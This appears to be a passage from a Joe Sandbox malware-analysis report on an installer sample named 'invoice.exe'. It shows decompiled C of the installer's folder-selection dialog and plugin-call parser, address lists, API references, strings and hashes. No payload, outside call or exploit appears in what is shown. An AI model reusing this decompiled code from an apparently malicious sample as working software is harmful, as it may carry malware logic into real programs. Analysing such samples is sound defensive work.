						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040596A(_t146) != 0 && E00405996(_t146) == 0) {
						E004058FD(_t146);
					}
					 *0x42ebd8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E00404026(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404026(_t166);
					E0040405B(_t165);
					_t138 = E004062FD(7);
					if(_t138 == 0) {
						L53:
						return E0040408D(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, "true");
						goto L8;
					}
				}
			}

0x00404496
0x0040449c
0x004044a2
0x004044a6
0x004044a9
0x004044af
0x004044bd
0x004044c0
0x004044c8
0x004044ce
0x004044ce
0x004044da
0x004044dd
0x0040454b
0x00404552
0x00404629
0x00404630
0x0040463f
0x0040463f
0x00404643
0x0040464d
0x0040465a
0x0040465c
0x0040465c
0x0040466a
0x00404671
0x00404678
0x0040467b
0x004046b2
0x004046b4
0x004046ba
0x004046bf
0x004046c3
0x004046c5
0x004046c5
0x004046e1
0x00000000
0x004046e3
0x004046e6
0x004046f4
0x004046fa
0x004046fb
0x004046fe
0x00404701
0x00000000
0x00404701
0x0040467d
0x0040467f
0x00404683
0x00000000
0x00000000
0x00000000
0x00000000
0x00404685
0x00404685
0x00404692
0x00404697
0x00000000
0x00000000
0x0040469b
0x0040469d
0x0040469d
0x004046a5
0x004046a7
0x004046aa
0x004046ad
0x004046b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004046b0
0x0040470d
0x00404717
0x0040471a
0x0040471d
0x00404724
0x00404724
0x00404726
0x00404726
0x0040472b
0x0040472d
0x00404735
0x0040473c
0x0040473e
0x00404749
0x00404749
0x0040473e
0x00404750
0x00404759
0x00404763
0x0040476b
0x00404786
0x0040476d
0x00404776
0x00404776
0x0040476b
0x0040478b
0x00404790
0x00404795
0x0040479e
0x0040479e
0x004047a7
0x004047a9
0x004047a9
0x004047b5
0x004047bd
0x004047bf
0x004047c5
0x004047c7
0x004047c7
0x004047c5
0x004047cc
0x00000000
0x004047cc
0x0040467b
0x00404632
0x00404639
0x00000000
0x00000000
0x00000000
0x00404639
0x00404558
0x00404561
0x0040457b
0x00404580
0x0040458a
0x00404591
0x0040459d
0x004045a0
0x004045a3
0x004045aa
0x004045b2
0x004045b5
0x004045b9
0x004045c0
0x004045c8
0x00404622
0x004045ca
0x004045cb
0x004045d2
0x004045dc
0x004045e4
0x004045f1
0x00404605
0x00404609
0x00404609
0x00404605
0x0040460e
0x0040461b
0x0040461b
0x004045c8
0x00000000
0x00404580
0x0040456e
0x00000000
0x00404574
0x00404574
0x00000000
0x00404574
0x004044df
0x004044ec
0x004044f5
0x00404502
0x00404502
0x00404509
0x0040450f
0x00404518
0x0040451b
0x0040451e
0x00404526
0x00404529
0x0040452c
0x00404532
0x00404539
0x00404540
0x004047d2
0x004047e4
0x00404546
0x00404549
0x00000000
0x00404549
0x00404540

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044E5
SetWindowTextA.USER32(00000000,-00430000), ref: 0040450F
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
CoTaskMemFree.OLE32(00000000), ref: 004045CB
lstrcmpiA.KERNEL32(Call,Yllerion Setup: Installing), ref: 004045FD
lstrcatA.KERNEL32(-00430000,Call), ref: 00404609
SetDlgItemTextA.USER32(?,000003FB,-00430000), ref: 0040461B

Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678

Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
Part of subcall function 004061CF: CharPrevA.USER32(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,-00430000,?,00429840,-00430000,-00430000,000003FB,-00430000), ref: 004046D9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4

Part of subcall function 0040484D: lstrlenA.KERNEL32(Yllerion Setup: Installing,Yllerion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,-00430000), ref: 004048EB
Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,Yllerion Setup: Installing), ref: 00404906

Strings

Yllerion Setup: Installing, xrefs: 00404593, 004045F6
A, xrefs: 004045B9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository, xrefs: 004045E6
Call, xrefs: 004045F7, 004045FC, 00404607
g, xrefs: 00404750

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$Call$Yllerion Setup: Installing$g
API String ID: 2624150263-2546930237
Opcode ID: 032b3df766434426d98d5d6b576ada36a61d7b9502b5faa4e1f3676bff7237ef
Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
Opcode Fuzzy Hash: 032b3df766434426d98d5d6b576ada36a61d7b9502b5faa4e1f3676bff7237ef
Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001A5D() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t198;
				signed int _t201;
				void* _t203;
				void* _t205;
				CHAR* _t207;
				void* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t219;
				signed short _t221;
				struct HINSTANCE__* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				char* _t228;
				void* _t239;
				signed char _t240;
				signed int _t241;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				signed int _t258;
				void* _t259;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed char _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed char _t307;
				signed int _t308;
				CHAR* _t309;
				CHAR* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				void* _t315;
				signed int _t316;
				void* _t317;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t317 = 0;
				_v48 = 0;
				_t198 = E10001215();
				_v24 = _t198;
				_v28 = _t198;
				_v44 = E10001215();
				_t308 = E1000123B();
				_v52 = _t308;
				_v12 = _t308;
				while(1) {
					_t201 = _v32;
					_v56 = _t201;
					if(_t201 != _t283 && _t317 == _t283) {
						break;
					}
					_t307 =  *_t308;
					_t286 = _t307;
					_t203 = _t286 - _t283;
					if(_t203 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t205 = _v56 - _t283;
						if(_t205 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t317 - _t283;
							if(_t317 == _t283) {
								_t317 = GlobalAlloc(0x40, 0x14a4);
								 *(_t317 + 0x810) = _t283;
								 *(_t317 + 0x814) = _t283;
							}
							_t287 = _v36;
							_t43 = _t317 + 8; // 0x8
							_t207 = _t43;
							_t44 = _t317 + 0x408; // 0x408
							_t309 = _t44;
							 *_t317 = _t287;
							 *_t207 =  *_t207 & 0x00000000;
							 *(_t317 + 0x808) = _t283;
							 *_t309 =  *_t309 & 0x00000000;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *(_t317 + 0x80c) = _t283;
							 *(_t317 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t315 = 0;
								GlobalFree(_t317);
								_t317 = E100012FE(_v24);
								__eflags = _t317 - _t283;
								if(_t317 == _t283) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t239 =  *(_t317 + 0x14a0);
									__eflags = _t239 - _t283;
									if(_t239 == _t283) {
										break;
									}
									_t315 = _t317;
									_t317 = _t239;
									__eflags = _t317 - _t283;
									if(_t317 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t315 - _t283;
								if(_t315 != _t283) {
									 *(_t315 + 0x14a0) = _t283;
								}
								_t240 =  *(_t317 + 0x810);
								__eflags = _t240 & 0x00000008;
								if((_t240 & 0x00000008) == 0) {
									_t241 = _t240 | 0x00000002;
									__eflags = _t241;
									 *(_t317 + 0x810) = _t241;
								} else {
									_t317 = E10001534(_t317);
									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L28:
									lstrcpyA(_t207, _v44);
									L29:
									lstrcpyA(_t309, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t308 = _v12;
										continue;
									}
									break;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L29;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t205 != 1) {
							goto L39;
						}
						_t247 = _v16;
						if(_v40 == _t283) {
							_t247 = _t247 - 1;
						}
						 *(_t317 + 0x814) = _t247;
						goto L39;
					}
					_t248 = _t203 - 0x23;
					if(_t248 == 0) {
						__eflags = _t308 - _v52;
						if(_t308 <= _v52) {
							L15:
							_v32 = _t283;
							_v36 = _t283;
							goto L17;
						}
						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
						if( *((char*)(_t308 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							L40:
							_t250 = _v32 - _t283;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t307 - 0x2a;
								if(_t307 == 0x2a) {
									_v36 = 2;
									L61:
									_t308 = _v12;
									_v28 = _v24;
									_t283 = 0;
									__eflags = 0;
									L62:
									_t316 = _t308 + 1;
									__eflags = _t316;
									_v12 = _t316;
									goto L63;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 == 0x2d) {
									L132:
									_t252 = _t308 + 1;
									__eflags =  *_t252 - 0x3e;
									if( *_t252 != 0x3e) {
										L134:
										_t252 = _t308 + 1;
										__eflags =  *_t252 - 0x3a;
										if( *_t252 != 0x3a) {
											L141:
											_v28 =  &(_v28[1]);
											 *_v28 = _t307;
											goto L62;
										}
										__eflags = _t307 - 0x2d;
										if(_t307 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t252;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L61;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t307 - 0x3a;
								if(_t307 != 0x3a) {
									goto L141;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 != 0x2d) {
									goto L134;
								}
								goto L132;
							}
							_t258 = _t250 - 1;
							__eflags = _t258;
							if(_t258 == 0) {
								L74:
								_t259 = _t286 - 0x22;
								__eflags = _t259 - 0x55;
								if(_t259 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											L115:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L120:
												 *__eax =  *__eax & 0x00000000;
												__ebx = E10001224(_v24);
												goto L91;
											}
											L116:
											__eflags = __cl;
											if(__cl == 0) {
												goto L120;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 1;
										__ebx = E10001215();
										 &_v12 = E100019FB( &_v12);
										__eax = E10001429(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x818) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x828) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E100019FB( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t133 = _v16 + 0x41; // 0x41
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t261 =  *(_t317 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x82c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x830; // 0x830
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t262 = _t258 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t283;
								goto L74;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L141;
							}
							_t265 = _t286 - 0x21;
							__eflags = _t265;
							if(_t265 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t266 = _t265 - 0x42;
							__eflags = _t266;
							if(_t266 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t317 + 0x810;
									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t271 = _t266;
							__eflags = _t271;
							if(_t271 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t272 = _t271 - 9;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(8);
								goto L56;
							}
							_t273 = _t272 - 4;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(4);
								goto L56;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t274 != 0;
							if(_t274 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t277 = _t248 - 5;
					if(_t277 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t283;
						_v20 = _t283;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t283;
						goto L17;
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						_v32 = 2;
						_v8 = _t283;
						_v20 = _t283;
						goto L17;
					}
					if(_t281 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
					L161:
					return _t317;
				} else {
					_t215 =  *_t317 - 1;
					if(_t215 == 0) {
						_t178 = _t317 + 8; // 0x8
						_t311 = _t178;
						__eflags =  *_t311;
						if( *_t311 != 0) {
							_t216 = GetModuleHandleA(_t311);
							__eflags = _t216 - _t283;
							 *(_t317 + 0x808) = _t216;
							if(_t216 != _t283) {
								L150:
								_t183 = _t317 + 0x408; // 0x408
								_t312 = _t183;
								_t217 = E100015A4( *(_t317 + 0x808), _t312);
								__eflags = _t217 - _t283;
								 *(_t317 + 0x80c) = _t217;
								if(_t217 == _t283) {
									__eflags =  *_t312 - 0x23;
									if( *_t312 == 0x23) {
										_t186 = _t317 + 0x409; // 0x409
										_t221 = E100012FE(_t186);
										__eflags = _t221 - _t283;
										if(_t221 != _t283) {
											__eflags = _t221 & 0xffff0000;
											if((_t221 & 0xffff0000) == 0) {
												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t283;
								if(_v48 != _t283) {
									L157:
									_t312[lstrlenA(_t312)] = 0x41;
									_t219 = E100015A4( *(_t317 + 0x808), _t312);
									__eflags = _t219 - _t283;
									if(_t219 != _t283) {
										L145:
										 *(_t317 + 0x80c) = _t219;
										goto L161;
									}
									__eflags =  *(_t317 + 0x80c) - _t283;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t196 = _t317 + 4;
									 *_t196 =  *(_t317 + 4) | 0xffffffff;
									__eflags =  *_t196;
									goto L161;
								} else {
									__eflags =  *(_t317 + 0x80c) - _t283;
									if( *(_t317 + 0x80c) != _t283) {
										goto L161;
									}
									goto L157;
								}
							}
							_t224 = LoadLibraryA(_t311);
							__eflags = _t224 - _t283;
							 *(_t317 + 0x808) = _t224;
							if(_t224 == _t283) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t317 + 0x408; // 0x408
						_t226 = E100012FE(_t179);
						 *(_t317 + 0x80c) = _t226;
						__eflags = _t226 - _t283;
						goto L159;
					}
					_t227 = _t215 - 1;
					if(_t227 == 0) {
						_t176 = _t317 + 0x408; // 0x408
						_t228 = _t176;
						__eflags =  *_t228;
						if( *_t228 == 0) {
							goto L161;
						}
						_t219 = E100012FE(_t228);
						L144:
						goto L145;
					}
					if(_t227 != 1) {
						goto L161;
					}
					_t80 = _t317 + 8; // 0x8
					_t284 = _t80;
					_t313 = E100012FE(_t80);
					 *(_t317 + 0x808) = _t313;
					if(_t313 == 0) {
						goto L160;
					}
					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x848)) = 1;
					 *((intOrPtr*)(_t317 + 0x838)) = 1;
					_t89 = _t317 + 0x408; // 0x408
					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
					goto L144;
				}
			}

0x10001a65
0x10001a68
0x10001a6b
0x10001a6e
0x10001a71
0x10001a74
0x10001a77
0x10001a79
0x10001a7c
0x10001a81
0x10001a84
0x10001a8c
0x10001a94
0x10001a96
0x10001a99
0x10001aa1
0x10001aa1
0x10001aa6
0x10001aa9
0x00000000
0x00000000
0x10001ab3
0x10001ab5
0x10001aba
0x10001abc
0x10001b2e
0x10001b2e
0x10001b2e
0x10001b32
0x10001b35
0x10001b37
0x10001b59
0x10001b5c
0x10001b5e
0x10001b6d
0x10001b6f
0x10001b75
0x10001b75
0x10001b7b
0x10001b7e
0x10001b7e
0x10001b81
0x10001b81
0x10001b87
0x10001b89
0x10001b8c
0x10001b92
0x10001b95
0x10001b95
0x10001b97
0x10001b9d
0x10001ba0
0x10001bc4
0x10001bc7
0x00000000
0x00000000
0x10001bca
0x10001bcc
0x10001bda
0x10001bdd
0x10001bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x10001be1
0x10001be1
0x10001be1
0x10001be7
0x10001be9
0x00000000
0x00000000
0x10001beb
0x10001bed
0x10001bef
0x10001bf1
0x00000000
0x00000000
0x00000000
0x10001bf1
0x10001bf3
0x10001bf5
0x10001bf7
0x10001bf7
0x10001bfd
0x10001c03
0x10001c05
0x10001c19
0x10001c19
0x10001c1b
0x10001c07
0x10001c0d
0x10001c10
0x10001c10
0x00000000
0x10001ba2
0x10001ba2
0x10001ba2
0x10001ba3
0x10001bab
0x10001baf
0x10001bb5
0x10001bb9
0x10001c21
0x10001c24
0x10001c27
0x10001cb1
0x10001cb5
0x10001a9e
0x00000000
0x10001a9e
0x00000000
0x10001cb5
0x10001ba5
0x10001ba5
0x10001ba6
0x00000000
0x00000000
0x10001ba8
0x10001ba9
0x00000000
0x00000000
0x00000000
0x10001ba9
0x10001ba0
0x10001b3a
0x00000000
0x00000000
0x10001b43
0x10001b46
0x10001b53
0x10001b53
0x10001b48
0x00000000
0x10001b48
0x10001abe
0x10001ac1
0x10001b12
0x10001b15
0x10001b26
0x10001b26
0x10001b29
0x00000000
0x10001b29
0x10001b17
0x10001b1b
0x00000000
0x00000000
0x10001b1d
0x10001b20
0x10001c2f
0x10001c32
0x10001c32
0x10001c34
0x10001f7a
0x10001f7d
0x10001fe0
0x10001ca2
0x10001ca5
0x10001ca8
0x10001cab
0x10001cab
0x10001cad
0x10001cad
0x10001cad
0x10001cae
0x00000000
0x10001cae
0x10001f7f
0x10001f82
0x10001f8e
0x10001f8e
0x10001f91
0x10001f94
0x10001f9f
0x10001f9f
0x10001fa2
0x10001fa5
0x10001fec
0x10001fef
0x10001ff2
0x00000000
0x10001ff2
0x10001fa7
0x10001faa
0x00000000
0x00000000
0x10001fac
0x10001fb3
0x10001fb3
0x10001fb9
0x10001fbc
0x10001fd8
0x10001fbe
0x10001fc7
0x10001fca
0x10001fca
0x00000000
0x10001fbc
0x10001f96
0x00000000
0x10001f96
0x10001f84
0x10001f87
0x00000000
0x00000000
0x10001f89
0x10001f8c
0x00000000
0x00000000
0x00000000
0x10001f8c
0x10001c3a
0x10001c3a
0x10001c3b
0x10001d6a
0x10001d6a
0x10001d6f
0x10001d72
0x00000000
0x00000000
0x10001d7f
0x00000000
0x10001f22
0x10001f25
0x10001f28
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x10001f32
0x10001f32
0x10001f35
0x10001f47
0x10001f4a
0x10001f53
0x00000000
0x10001f53
0x10001f37
0x10001f37
0x10001f39
0x00000000
0x00000000
0x10001f3b
0x10001f3d
0x10001f3f
0x10001f3f
0x10001f3f
0x10001f40
0x10001f42
0x10001f44
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x00000000
0x10001f30
0x00000000
0x10001dc6
0x00000000
0x00000000
0x10001dd2
0x00000000
0x00000000
0x10001db9
0x10001dbd
0x10001dc1
0x00000000
0x00000000
0x10001ef4
0x10001ef8
0x00000000
0x00000000
0x10001efe
0x10001f06
0x10001f0d
0x10001f15
0x00000000
0x00000000
0x10001e91
0x10001e91
0x00000000
0x00000000
0x10001ddb
0x00000000
0x00000000
0x10001f72
0x00000000
0x00000000
0x10001f62
0x00000000
0x00000000
0x10001f66
0x00000000
0x00000000
0x10001f6e
0x00000000
0x00000000
0x10001eb4
0x00000000
0x00000000
0x10001e99
0x10001e9b
0x00000000
0x00000000
0x10001ebc
0x00000000
0x00000000
0x10001ea1
0x00000000
0x00000000
0x10001ea5
0x00000000
0x00000000
0x10001f6a
0x10001f74
0x10001f74
0x00000000
0x00000000
0x10001ec4
0x10001ec8
0x10001ecd
0x10001ed0
0x10001ed1
0x10001ed4
0x10001eda
0x10001eda
0x00000000
0x00000000
0x10001f5a
0x00000000
0x00000000
0x10001ea9
0x10001eac
0x10001eae
0x00000000
0x00000000
0x10001de2
0x10001de2
0x00000000
0x00000000
0x10001eb8
0x10001ebe
0x10001ebe
0x10001de4
0x10001de4
0x10001de7
0x10001dee
0x10001df1
0x10001df3
0x10001df5
0x10001df6
0x10001dfa
0x10001dfd
0x10001e03
0x10001e09
0x10001e09
0x10001e0b
0x10001e0b
0x10001e0e
0x10001e14
0x10001e16
0x10001e1a
0x10001e1f
0x10001e1f
0x10001e21
0x10001e21
0x10001e24
0x10001e27
0x10001e30
0x10001e33
0x10001e36
0x10001e36
0x10001e38
0x10001e3b
0x10001e41
0x00000000
0x10001e41
0x10001e05
0x10001e07
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d86
0x10001d8c
0x10001d8f
0x10001d91
0x10001d91
0x10001d94
0x10001d98
0x10001da5
0x10001da7
0x10001dad
0x10001dad
0x10001dad
0x00000000
0x00000000
0x10001ee2
0x10001ee6
0x10001eeb
0x10001eee
0x10001e47
0x10001e47
0x10001e49
0x00000000
0x00000000
0x10001e4f
0x10001e4f
0x10001e53
0x10001e5a
0x10001e7e
0x10001e7e
0x10001e82
0x10001e84
0x10001e87
0x10001e87
0x10001e8a
0x10001e8a
0x00000000
0x10001e82
0x10001e5f
0x10001e62
0x10001e62
0x10001e69
